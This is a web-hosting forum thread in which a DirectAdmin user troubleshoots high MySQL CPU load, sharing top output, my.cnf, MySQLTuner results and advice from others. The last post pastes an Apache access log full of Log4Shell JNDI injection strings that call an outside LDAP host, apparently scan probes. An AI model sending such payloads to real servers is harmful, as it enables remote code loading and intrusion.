MYSQL high CPU usage

M

mikajaxxx

Verified User
Joined
Sep 11, 2021
Messages
33
Hi every one i get this error:

Code: 
Warning: The system load average is 74.39

This is an automated message notifying you that the 5 minute load average on your system is 74.39.

This has exceeded the 10 threshold.

One Minute      - 36.05
Five Minutes    - 74.39
Fifteen Minutes - 47.64

top - 16:59:02 up 31 min,  1 user,  load average: 36.05, 74.39, 47.64
Tasks: 246 total,   5 running, 241 sleeping,   0 stopped,   0 zombie
%Cpu(s): 72.7 us, 24.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  3.0 si,  0.0 st
KiB Mem :  3781860 total,  1254872 free,  1817604 used,   709384 buff/cache
KiB Swap:  4194300 total,  3338200 free,   856100 used.  1725372 avail Mem
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
 6013 mysql     20   0 1604344 332272   9032 S  68.8  8.8   0:24.21 /usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid
 4579 vipgift   20   0  317424  57684   4248 R  43.8  1.5   0:18.24 lsphp:domains/vipgiftcard.net/private_html/index.phto_avoid_overwrite_important_env
 6067 valatan   20   0  300276  50444   5016 R  37.5  1.3   0:10.73 lsphp:tan/domains/valatan.com/private_html/index.ph_room_to_avoid_overwrite_important_env
 5038 valatan   20   0  302324  53748   5032 R  31.2  1.4   0:08.78 lsphp:tan/domains/valatan.com/private_html/index.ph_room_to_avoid_overwrite_important_env
 6128 root      20   0   58412   2196   1484 R  12.5  0.1   0:00.02 /usr/bin/top -c -b -n 1
 1197 root      20   0 1133968   8216   2724 S   6.2  0.2   0:05.45 /usr/local/directadmin/directadmin

the main treats related to "/usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid" & also "/private_html/index.ph_room_to_avoid_overwrite_important_env" which i have no idea about it!
Anyone could help me to reduce cpu load?


directadmin: 1.63.3
webserver : openlitespeed
 
Any time I see high mysql usage it's a good idea to check your optimizations, i use this tool:

github.com

GitHub - major/MySQLTuner-perl: MySQLTuner is a script written in Perl that will assist you with your MySQL configuration and make recommendations for increased performance and stability.

MySQLTuner is a script written in Perl that will assist you with your MySQL configuration and make recommendations for increased performance and stability. - major/MySQLTuner-perl
github.com github.com

Also, looks like your VM (assuming VM) only has 4gb ram, could be undersized for your load. (I never build a hosting environment with less than 16gb ram.)

Would be good to check the swapiness of your linux install as I see free ram but still using swap. I set mine always to 0, so that ram needs to be exhausted before any swapping happens, many installs default to 60. Check this article:

www.howtoforge.com

How to change the Swappiness of your Linux system

Swappiness is the kernel parameter that defines how much (and how often) your Linux kernel will copy RAM contents to swap. This parameters default va...
www.howtoforge.com

For the "/private_html/index.ph_room_to_avoid_overwrite_important_env" reference, if you didn't build the site, it wouldn't hurt to check it out and see what it does, or check with the developer.
 
my.cnf settings to check, maybe SEO bots to block (had this years ago with several aggressive SEO spiders)
 
Hello
johannes said:
my.cnf settings to check, maybe SEO bots to block (had this years ago with several aggressive SEO spiders)
Click to expand...
Hello
i am not a pro could you please be more specific?
here is etc/my.cnf

Code: 
# For advice on how to change settings please see
# http://dev.mysql.com/doc/refman/5.7/en/server-configuration-defaults.html

[mysqld]
max_allowed_packet=64M
local-infile = 0
#
# Remove leading # and set to the amount of RAM for the most important data
# cache in MySQL. Start at 70% of total RAM for dedicated server, else 10%.
# innodb_buffer_pool_size = 128M
#
# Remove leading # to turn on a very important data integrity option: logging
# changes to the binary log between backups.
# log_bin
#
# Remove leading # to set options mainly useful for reporting servers.
# The server defaults are faster for transactions and fast SELECTs.
# Adjust sizes as needed, experiment to find the optimal values.
# join_buffer_size = 128M
# sort_buffer_size = 2M
# read_rnd_buffer_size = 2M
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock

# Disabling symbolic-links is recommended to prevent assorted security risks
symbolic-links=0

log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

also last mysqld.log

Code: 
2021-12-15T00:00:21.702063Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 6227ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:00:44.137469Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 5284ms. The settings might not be optimal. (flushed=0 and evicted=970, during the time.)
2021-12-15T00:00:52.655294Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 4454ms. The settings might not be optimal. (flushed=687 and evicted=631, during the time.)
2021-12-15T00:01:45.917737Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 5115ms. The settings might not be optimal. (flushed=1326 and evicted=0, during the time.)
2021-12-15T00:01:56.666613Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 4446ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:02:03.862250Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 5481ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:03:58.902037Z 19988 [Note] Access denied for user 'da_admin'@'localhost' (using password: YES)
2021-12-15T00:14:24.685368Z 20814 [Note] Access denied for user 'da_admin'@'localhost' (using password: YES)
2021-12-15T00:18:01.549917Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 6353ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:20:31.450842Z 0 [Note] InnoDB: page_cleaner: 1000ms intended loop took 6601ms. The settings might not be optimal. (flushed=2001 and evicted=0, during the time.)
2021-12-15T00:25:04.723089Z 21881 [Note] Access denied for user 'da_admin'@'localhost' (using password: YES)

also already i followed this article but still high cpu load!

Troubleshooting | Directadmin Docs

DirectAdmin Knowledge Base
docs.directadmin.com
 
cjd said:
For the "/private_html/index.ph_room_to_avoid_overwrite_important_env" reference, if you didn't build the site, it wouldn't hurt to check it out and see what it does, or check with the developer.
Click to expand...
there is not such file! private_html is symlink to public_html . but i didn't find such file on server
 
Did you check your swapiness and check with mysqltuner? mysqltuner will give you suggestions on what you need to change in your my.cnf
 
cjd said:
Did you check your swapiness and check with mysqltuner? mysqltuner will give you suggestions on what you need to change in your my.cnf
Click to expand...
yeah i set swapiness as 1 ,i never used mysqltuner. first i must go for a full backup
 
i installed mysqtuner, here is the output
Code: 
 >>  
MySQLTuner 1.8.5 - Major Hayden <[email protected]>
 >>  Bug reports, feature requests, and downloads at http://mysqltuner.pl/
 >>  Run with '--help' for additional options and output filtering

[--] Skipped version check for MySQLTuner script
[OK] Currently running supported MySQL version 5.7.35
[OK] Operating on 64-bit architecture

-------- Log file Recommendations ------------------------------------------------------------------
[OK] Log file /var/log/mysqld.log exists
[--] Log file: /var/log/mysqld.log(370K)
[OK] Log file /var/log/mysqld.log is not empty
[OK] Log file /var/log/mysqld.log is smaller than 32 Mb
[OK] Log file /var/log/mysqld.log is readable.
[!!] /var/log/mysqld.log contains 250 warning(s).
[!!] /var/log/mysqld.log contains 62 error(s).
[--] 32 start(s) detected in /var/log/mysqld.log
[--] 1) 2021-12-14T16:57:55.837935Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 2) 2021-12-14T16:27:42.467565Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 3) 2021-12-14T14:56:32.661655Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 4) 2021-12-14T14:47:35.464868Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 5) 2021-12-14T14:40:47.027137Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 6) 2021-12-14T14:39:28.655112Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 7) 2021-12-14T12:36:31.048015Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 8) 2021-12-14T12:35:44.865593Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 9) 2021-12-14T12:04:43.328892Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 10) 2021-12-14T11:26:01.693063Z 0 [Note] /usr/sbin/mysqld: ready for connections.
[--] 23 shutdown(s) detected in /var/log/mysqld.log
[--] 1) 2021-12-14T16:57:52.964860Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 2) 2021-12-14T16:25:53.328006Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 3) 2021-12-14T14:54:44.945343Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 4) 2021-12-14T14:47:32.931880Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 5) 2021-12-14T14:40:01.792113Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 6) 2021-12-14T14:38:06.992349Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 7) 2021-12-14T12:36:29.082516Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 8) 2021-12-14T12:34:41.111645Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 9) 2021-12-14T12:04:40.596363Z 0 [Note] /usr/sbin/mysqld: Shutdown complete
[--] 10) 2021-12-14T11:25:59.607090Z 0 [Note] /usr/sbin/mysqld: Shutdown complete

-------- Storage Engine Statistics -----------------------------------------------------------------
[--] Status: +ARCHIVE +BLACKHOLE +CSV -FEDERATED +InnoDB +MEMORY +MRG_MYISAM +MyISAM +PERFORMANCE_SCHEMA
[--] Data in MyISAM tables: 39.3M (Tables: 665)
[--] Data in InnoDB tables: 1.4G (Tables: 7818)
[--] Data in MEMORY tables: 0B (Tables: 24)
[OK] Total fragmented tables: 0

-------- Analysis Performance Metrics --------------------------------------------------------------
[--] innodb_stats_on_metadata: OFF
[OK] No stat updates during querying INFORMATION_SCHEMA.

-------- Security Recommendations ------------------------------------------------------------------
[OK] There are no anonymous accounts for any database users
[OK] All database users have passwords assigned
[!!] There is no basic password file list!

-------- CVE Security Recommendations --------------------------------------------------------------
[OK] NO SECURITY CVE FOUND FOR YOUR VERSION

-------- Performance Metrics -----------------------------------------------------------------------
[--] Up for: 16h 6m 10s (19M q [339.716 qps], 49K conn, TX: 28G, RX: 6G)
[--] Reads / Writes: 99% / 1%
[--] Binary logging is disabled
[--] Physical Memory     : 3.6G
[--] Max MySQL memory    : 9.8G
[--] Other process memory: 0B
[--] Total buffers: 169.0M global + 65.1M per thread (151 max threads)
[--] P_S Max memory usage: 72B
[--] Galera GCache Max memory usage: 0B
[!!] Maximum reached memory usage: 7.0G (195.02% of installed RAM)
[!!] Maximum possible memory usage: 9.8G (270.84% of installed RAM)
[!!] Overall possible memory usage with other process exceeded memory
[OK] Slow queries: 0% (0/19M)
[OK] Highest usage of available connections: 71% (108/151)
[OK] Aborted connections: 0.05%  (25/49755)
[!!] name resolution is active : a reverse name resolution is made for each new connection and can reduce performance
[OK] Query cache is disabled by default due to mutex contention on multiprocessor machines.
[OK] Sorts requiring temporary tables: 0% (86 temp sorts / 4M sorts)
[!!] Joins performed without indexes: 143942
[OK] Temporary tables created on disk: 2% (137K on disk / 5M total)
[OK] Thread cache hit rate: 92% (3K created / 49K connections)
[OK] Table cache hit rate: 96% (45M hits / 46M requests)
[!!] table_definition_cache(1400) is lower than number of tables(8786)
[OK] Open file limit used: 0% (182/655K)
[OK] Table locks acquired immediately: 99% (299K immediate / 299K locks)

-------- Performance schema ------------------------------------------------------------------------
[--] Memory used by P_S: 72B
[--] Sys schema is installed.

-------- ThreadPool Metrics ------------------------------------------------------------------------
[--] ThreadPool stat is disabled.

-------- MyISAM Metrics ----------------------------------------------------------------------------
[!!] Key buffer used: 21.4% (1.7M used / 8.0M cache)
[OK] Key buffer size / total MyISAM indexes: 8.0M/5.9M
[OK] Read Key buffer hit rate: 97.7% (2M cached / 47K reads)
[!!] Write Key buffer hit rate: 53.5% (2K cached / 1K writes)

-------- InnoDB Metrics ----------------------------------------------------------------------------
[--] InnoDB is enabled.
[--] InnoDB Thread Concurrency: 0
[OK] InnoDB File per table is activated
[!!] InnoDB buffer pool / data size: 128.0M/1.4G
[!!] Ratio InnoDB log file size / InnoDB Buffer pool size (75 %): 48.0M * 2/128.0M should be equal to 25%
[OK] InnoDB buffer pool instances: 1
[--] Number of InnoDB Buffer Pool Chunk : 1 for 1 Buffer Pool Instance(s)
[OK] Innodb_buffer_pool_size aligned with Innodb_buffer_pool_chunk_size & Innodb_buffer_pool_instances
[OK] InnoDB Read buffer efficiency: 99.97% (2146231527 hits/ 2146782124 total)
[!!] InnoDB Write Log efficiency: 49.85% (71519 hits/ 143477 total)
[OK] InnoDB log waits: 0.00% (0 waits / 71958 writes)

-------- Aria Metrics ------------------------------------------------------------------------------
[--] Aria Storage Engine not available.

-------- TokuDB Metrics ----------------------------------------------------------------------------
[--] TokuDB is disabled.

-------- XtraDB Metrics ----------------------------------------------------------------------------
[--] XtraDB is disabled.

-------- Galera Metrics ----------------------------------------------------------------------------
[--] Galera is disabled.

-------- Replication Metrics -----------------------------------------------------------------------
[--] Galera Synchronous replication: NO
[--] No replication slave(s) for this server.
[--] Binlog format: ROW
[--] XA support enabled: ON
[--] Semi synchronous replication Master: Not Activated
[--] Semi synchronous replication Slave: Not Activated
[--] This is a standalone server

-------- Recommendations ---------------------------------------------------------------------------
General recommendations:
    Check warning line(s) in /var/log/mysqld.log file
    Check error line(s) in /var/log/mysqld.log file
    MySQL was started within the last 24 hours - recommendations may be inaccurate
    Reduce your overall MySQL memory footprint for system stability
    Dedicate this server to your database for highest performance.
    Configure your accounts with ip or subnets only, then update your configuration with skip-name-resolve=1
    We will suggest raising the 'join_buffer_size' until JOINs not using indexes are found.
             See https://dev.mysql.com/doc/internals/en/join-buffer-size.html
             (specially the conclusions at the bottom of the page).
    Before changing innodb_log_file_size and/or innodb_log_files_in_group read this: https://bit.ly/2TcGgtU
Variables to adjust:
  *** MySQL's maximum memory usage is dangerously high ***
  *** Add RAM before increasing MySQL buffer variables ***
    join_buffer_size (> 256.0K, or always use indexes with JOINs)
    table_definition_cache(1400) > 8786 or -1 (autosizing if supported)
    innodb_buffer_pool_size (>= 1.4G) if possible.
    innodb_log_file_size should be (=16M) if possible, so InnoDB total log files size equals to 25% of buffer pool size.
 
add to my.cnf three lines:
innodb_buffer_pool_size=1G
table_definition_cache=9000
skip-name-resolve
 
This is concerning:

[!!] Maximum reached memory usage: 7.0G (195.02% of installed RAM)
[!!] Maximum possible memory usage: 9.8G (270.84% of installed RAM)
Click to expand...

VM/machine needs more ram. There's going to be more issues in the future with performance. Looking at the log output you probably need 16GB of ram for it to run without swapping. Other changes already suggested will help, but more ram is needed.
 
the main problem is about CPU not ram. i have another vps running by cyber panel and just 1 GB ram!!!!! i have almost around 15 website on it with no problem at all & everything is fast enough
on my current directadmin vps i have 4 GB and just 12 websites! wiered situation! also the problem shows up recently maybe last two weeks!
 
cjd said:
VM/machine needs more ram.
Click to expand...
it's due to "+ 65.1M per thread" and 108 opened threads, but it's just alocated memory due to max_allowed_packet=64M it's not really used.
He has overloaded CPU and 1700mb free RAM. So first of all there max_allowed_packet can be reduced to 32, but not necessary yet. Also must configure some type of caching (opcache, lscache), check access/error logs - maybe this is just primitive dDOS or bots, and it can be solved by CSF.
 
Zhenyapan said:
it's due to "+ 65.1M per thread" and 108 opened threads, but it's just alocated memory due to max_allowed_packet=64M it's not really used.
He has overloaded CPU and 1700mb free RAM. So first of all there max_allowed_packet can be reduced to 32, but not necessary yet. Also must configure some type of caching (opcache, lscache), check access/error logs - maybe this is just primitive dDOS or bots, and it can be solved by CSF.
Click to expand...
yeah the ram is not the issue! i used mytop for monitoring mysql, nothing unusual reported . the querry was really low but the "/usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid" is the main problem. i don't know how that could have effect on cpu!
also "/private_html/index.ph_room_to_avoid_overwrite_important_env" is strange to me!
 
form directadmin ->log viewer/Apache access log
Code: 
65.227.43.42 - - [13/Dec/2021:02:35:22 +0000] "HEAD / HTTP/1.1" 200 0 "-" "-"
194.5.73.6 - - [14/Dec/2021:03:02:52 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-f79e92a1e96c9e8efee080209ed03a04_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:03:02:52 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-f79e92a1e96c9e8efee080209ed03a04_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-f79e92a1e96c9e8efee080209ed03a04_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:07:46:01 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-8c833a4ad4bc7edd61b4da6c5983e6ee_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:07:46:01 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8c833a4ad4bc7edd61b4da6c5983e6ee_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-8c833a4ad4bc7edd61b4da6c5983e6ee_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:08:24:09 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-02b6c121209817cd81fe241e1db94311_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:08:24:09 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-02b6c121209817cd81fe241e1db94311_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-02b6c121209817cd81fe241e1db94311_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:15:31:39 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-4c082834ea29bd1a49e31d25d4be02f9_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:15:31:40 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-4c082834ea29bd1a49e31d25d4be02f9_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-4c082834ea29bd1a49e31d25d4be02f9_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:18:38:23 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-5c378e4a6981691c21cc2d5899c5fe2f_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:18:38:23 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-5c378e4a6981691c21cc2d5899c5fe2f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-5c378e4a6981691c21cc2d5899c5fe2f_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:18:57:18 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-ad215cf7d93ea8b848e97bd7dd6c7fa3_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [14/Dec/2021:18:57:18 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ad215cf7d93ea8b848e97bd7dd6c7fa3_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-ad215cf7d93ea8b848e97bd7dd6c7fa3_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:01:16:02 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-a81810a62cfa07226b9f37b89d844f8a_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:01:16:02 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-a81810a62cfa07226b9f37b89d844f8a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-a81810a62cfa07226b9f37b89d844f8a_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:01:20:17 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-ce6f5efe524104fe943f18f451e0825a_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:01:20:17 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-ce6f5efe524104fe943f18f451e0825a_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-ce6f5efe524104fe943f18f451e0825a_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
